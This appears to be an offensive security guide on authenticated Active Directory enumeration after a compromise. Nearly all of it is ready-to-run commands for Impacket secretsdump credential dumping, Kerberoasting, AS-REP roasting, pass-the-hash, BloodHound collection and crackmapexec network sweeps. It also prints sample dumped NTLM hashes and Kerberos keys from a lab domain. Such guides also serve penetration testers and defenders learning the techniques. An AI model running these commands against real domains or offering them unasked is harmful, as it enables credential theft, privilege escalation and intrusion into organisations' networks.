This guide is currently under development, and I greatly welcome any suggestions or feedback at reaper.gitbook@gmail.com

Authenticated (Post-Compromise) Enumeration

Domain Mapping

Purpose: Extract AD objects and relationships for attack planning.

LDAP Domain Dump

Requirements: Valid domain credentials (user account)

Use Case: Post-credential compromise, domain mapping for attack planning

# Complete authenticated domain extraction
ldapdomaindump -u '<domain>\<username>' -p '<password>' <DC-IP>

# Alternative authentication method: -p also accepts an LM:NT hash pair instead of a password
# (the LM half is normally the empty-LM value aad3b435b51404eeaad3b435b51404ee when LM storage is disabled)
ldapdomaindump -u '<domain>\<username>' -p '<LM-hash>:<NTLM-hash>' <DC-IP>

Credential Extraction

Purpose: Harvest authentication material for lateral movement and privilege escalation.

Requirements: Administrative privileges on target system or DCSync rights for domain controllers

Use Case: When you have admin access to systems or specific privileges like "Replicating Directory Changes"

NTDS.dit and Registry Hive Extraction

# Complete credential dump from domain controller
python3 secretsdump.py <domain>/<username>:<password>@<DC-IP>
python3 secretsdump.py -hashes :<NTLM-hash> <domain>/<username>@<DC-IP>

Example output:

Impacket v0.13.0.dev0+20250728.93925.b5302a84 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0xd01d352a7b37e42791250a0ec4c4baa3
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:837fe788c26c344499fe1925c93f1ede:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
HACKME\WIN-R0BUVKRGBID$:aes256-cts-hmac-sha1-96:c0ccd9f1abf0f8ba60d302f0ecb193ba3801e4c4247332a585a1674f7b867a4a
HACKME\WIN-R0BUVKRGBID$:aes128-cts-hmac-sha1-96:9f7c71c1118f61fa9114c5101424418b
HACKME\WIN-R0BUVKRGBID$:des-cbc-md5:0eba0273bad6cddc
HACKME\WIN-R0BUVKRGBID$:plain_password_hex:13e281e55dc8d980092c231b7fee2200cfded5eb024fa4d177ee6c1c0e428bee9ae2797e50cf651bdde3002cd487f660672ea5118c4409593e9c4b1b8e1256b14b2bf9be84a84bfc54b72a1aaa2fff6f90b20d5374f770f7b43e57964c7730ce154bcc291fb9a5da7f5aace24a64aa0a43499b6ab06cf71442b2be0e5ca68d50b647edb16736034e46efde3e5b2126613912c08068525f59778a2a531464347a56d2fa055bd9d1740f13a4522848f6d94d59721c0e7fae6a7e6597066b00cb52407f3555ebb9154a0415a30a377dbc2fdf4e22f5a7104aed183e71954339d61224cfa598935ae952cf3660eac4116d0f
HACKME\WIN-R0BUVKRGBID$:aad3b435b51404eeaad3b435b51404ee:53301a3a3669d99ddc0ecfaa7cf43e7a:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xe5639817fd3ce0a5fc8d379c16f99fa6c830b85a
dpapi_userkey:0x5c8986c14d00d9457788fb334fc2a92d4d7acbc2
[*] NL$KM 
 0000   DD D5 F3 D0 EA 3E 3F 1B  34 70 72 E6 34 9B 62 78   .....>?.4pr.4.bx
 0010   CF 54 72 CA F4 86 45 A4  0A D0 DF 3F 2B 1E 2E E9   .Tr...E....?+...
 0020   33 65 9A 31 59 2A 57 27  7D 37 E7 ED 5C 6C 28 11   3e.1Y*W'}7..\l(.
 0030   24 92 C6 99 1B 0C 85 2F  70 9B 48 A2 8B 39 EA DF   $....../p.H..9..
NL$KM:ddd5f3d0ea3e3f1b347072e6349b6278cf5472caf48645a40ad0df3f2b1e2ee933659a31592a57277d37e7ed5c6c28112492c6991b0c852f709b48a28b39eadf
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:837fe788c26c344499fe1925c93f1ede:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:241ebf5d671f670e63a3a12fd332fd1a:::
hackme.local\sql-svc:1103:aad3b435b51404eeaad3b435b51404ee:837fe788c26c344499fe1925c93f1ede:::
hackme.local\7amoodeh:1104:aad3b435b51404eeaad3b435b51404ee:ba17e001e5467d85d16ae7247947929c:::
hackme.local\ra2fat:1105:aad3b435b51404eeaad3b435b51404ee:ba17e001e5467d85d16ae7247947929c:::
WIN-R0BUVKRGBID$:1000:aad3b435b51404eeaad3b435b51404ee:53301a3a3669d99ddc0ecfaa7cf43e7a:::
DESKTOP-4CJ1O3A$:1106:aad3b435b51404eeaad3b435b51404ee:fa92e5f8eb7ace3562e5711a869ffc59:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:eda01d9820ff8288900a83674eec768856d66f53ac19b244c9208376ebe5c484
Administrator:aes128-cts-hmac-sha1-96:48c2d624819f9c36281ff52aed35ce32
Administrator:des-cbc-md5:45838a9468a7d626
krbtgt:aes256-cts-hmac-sha1-96:2263f262b93c5c4969e7c1409ff6474a23bd3d1462a94a3b6cac52cd61e5a9d0
krbtgt:aes128-cts-hmac-sha1-96:c0dcf5e606ea8bb22f0608289ccab1bd
krbtgt:des-cbc-md5:9d6eb58fd9e6a208
hackme.local\sql-svc:aes256-cts-hmac-sha1-96:2c54eafc466fbd3f2d4d205b823b4784a00cb9e05d5922de9351c7b51fd198e9
hackme.local\sql-svc:aes128-cts-hmac-sha1-96:630dca436f714c2fe0522b226405fdc5
hackme.local\sql-svc:des-cbc-md5:5b9b342f459868c1
hackme.local\7amoodeh:aes256-cts-hmac-sha1-96:bab49f211d57e7fe609012db29f9f4b61f22bf5029716c888bd8ac7c8a527e6e
hackme.local\7amoodeh:aes128-cts-hmac-sha1-96:19318dc18b9d36107c346e339b7407d5
hackme.local\7amoodeh:des-cbc-md5:62c723379bfbaedc
hackme.local\ra2fat:aes256-cts-hmac-sha1-96:da91b33ef480372970d1260fb28adfba8a9e90a3aa7546bf16c8b8c86ae46554
hackme.local\ra2fat:aes128-cts-hmac-sha1-96:4bf2db5302b776eaa25e08af4debcbaf
hackme.local\ra2fat:des-cbc-md5:91fb8cf19ba8868f
WIN-R0BUVKRGBID$:aes256-cts-hmac-sha1-96:c0ccd9f1abf0f8ba60d302f0ecb193ba3801e4c4247332a585a1674f7b867a4a
WIN-R0BUVKRGBID$:aes128-cts-hmac-sha1-96:9f7c71c1118f61fa9114c5101424418b
WIN-R0BUVKRGBID$:des-cbc-md5:23465825ae6b383b
DESKTOP-4CJ1O3A$:aes256-cts-hmac-sha1-96:a558cfe8d560b89df823e1319a6f0554641f084e69ca4e82d742130fee58c4e9
DESKTOP-4CJ1O3A$:aes128-cts-hmac-sha1-96:1ecca604d68ae2a7478b1161d158daef
DESKTOP-4CJ1O3A$:des-cbc-md5:311adab07a326197
[*] Cleaning up...

Service Account Discovery

Purpose: Identify service accounts for Kerberoasting and AS-REP roasting attacks.

Kerberoasting Enumeration

Requirements: Valid domain user credentials (any user can perform Kerberoasting)

Use Case: Always applicable with domain credentials - service accounts are common targets

# SPN enumeration
python3 GetUserSPNs.py <domain>/<username>:<password> -dc-ip <DC-IP>
python3 GetUserSPNs.py -hashes :<NTLM-hash> <domain>/<username> -dc-ip <DC-IP>

Example output:

AS-REP Roasting

Requirements: Domain user credentials or list of usernames for unauthenticated attempts

Use Case: When accounts have "Do not require Kerberos preauthentication" enabled

# Find accounts without pre-authentication
python3 GetNPUsers.py <domain>/<username>:<password> -dc-ip <DC-IP>
python3 GetNPUsers.py <domain>/ -usersfile users.txt -dc-ip <DC-IP> -no-pass

Privilege Escalation Path Discovery

Purpose: Map AD relationships for privilege escalation opportunities.

BloodHound Data Collection

Requirements: Domain user credentials, network access to domain controllers and targets

Use Case: Mapping complex privilege relationships, planning privilege escalation paths

# Comprehensive collection
bloodhound-python -u <username> -p <password> -ns <DC-IP> -dc <FQDN> -d <domain.com> -c all
bloodhound-python -u <username> -p <password> -ns <DC-IP> -dc <FQDN> -d <domain.com> -c all --zip
bloodhound-python --hashes :<NTLM-hash> -u <username> -ns <DC-IP> -dc <FQDN> -d <domain.com> -c all

Multi-Protocol Information Gathering

Purpose: Leverage multiple protocols for comprehensive enumeration.

CrackMapExec Enumeration

# SMB-based enumeration
crackmapexec smb <DC-IP> -u '<username>' -p '<password>' --users
crackmapexec smb <DC-IP> -u '<username>' -p '<password>' --groups
crackmapexec smb <DC-IP> -u '<username>' -p '<password>' --shares
crackmapexec smb <DC-IP> -u '<username>' -p '<password>' --sessions
crackmapexec smb <DC-IP> -u '<username>' -p '<password>' --disks

# LDAP-based enumeration
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --users
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --groups
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --admin-count
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --trusted-for-delegation
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --password-not-required

# Advanced LDAP queries (--kerberoasting and --asreproast take an output file for the collected hashes)
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --kerberoasting <output-file>
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --asreproast <output-file>
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --gmsa

# Network-wide enumeration
crackmapexec smb 192.168.1.0/24 -u '<username>' -p '<password>' --shares
crackmapexec ldap 192.168.1.0/24 -u '<username>' -p '<password>' --users

Requirements: Valid domain credentials, network access to targets

Use Case: Network-wide enumeration, multi-protocol correlation, bulk operations

Password Policy and Account Lockout Analysis

# Extract password policies
crackmapexec smb <DC-IP> -u '<username>' -p '<password>' --pass-pol
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --pass-pol

# Fine-grained password policy enumeration
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --fgpp

Requirements: Domain user credentials

Use Case: Planning password attacks, understanding lockout thresholds

Security Identifier (SID) Analysis

Purpose: Enumerate objects through SID bruteforcing.

Comprehensive SID Enumeration

# Basic SID enumeration
python3 lookupsid.py <domain>/<username>:<password>@<DC-IP>
python3 lookupsid.py guest@<DC-IP> -no-pass

# Custom RID upper bound (the positional argument is the maximum RID to try; default is 4000)
python3 lookupsid.py <domain>/<username>:<password>@<DC-IP> 2000
python3 lookupsid.py <domain>/<username>:<password>@<DC-IP> 5000

# Highest RID found (last line of the output)
python3 lookupsid.py <domain>/<username>:<password>@<DC-IP> | tail -1

Requirements: Valid credentials or guest access, RPC access to domain controllers

Use Case: Discovering hidden accounts, service accounts, and non-standard objects

Advanced LDAP Enumeration

Purpose: Perform targeted queries for specific attack vectors.

Windapsearch Enumeration

# Basic enumeration
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password>

# Privileged user discovery
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password> --da
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password> --privileged-users

# Delegation enumeration
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password> --unconstrained-users
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password> --unconstrained-computers
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password> --constrained-users

# Computer enumeration
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password> --computers
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password> --dc

# Custom LDAP queries
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password> \
  --custom "(&(objectClass=user)(servicePrincipalName=*))"
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password> \
  --custom "(&(objectClass=computer)(operatingSystem=*Server*))"

Requirements: Domain user credentials, LDAP access to domain controllers

Use Case: Targeted enumeration for specific attack vectors, custom queries

Trust Relationship Analysis

Purpose: Map trust relationships for cross-domain attacks.

Trust Enumeration

# Basic trust discovery
python3 getTrusts.py <domain>/<username>:<password> -dc-ip <DC-IP>

# Cross-domain enumeration (one trusted domain per line in trusted_domains.txt)
while read -r domain; do
    echo "Enumerating $domain"
    python3 GetADUsers.py "$domain"/<username>:<password> -all -dc-ip <DC-IP>
    python3 GetUserSPNs.py "$domain"/<username>:<password> -dc-ip <DC-IP>
done < trusted_domains.txt

# Trust-specific BloodHound collection
bloodhound-python -u <username> -p <password> -ns <DC-IP> -d <domain.com> -c Trusts

Requirements: Domain user credentials, network access to trusted domains

Use Case: Multi-domain environments with established trust relationships
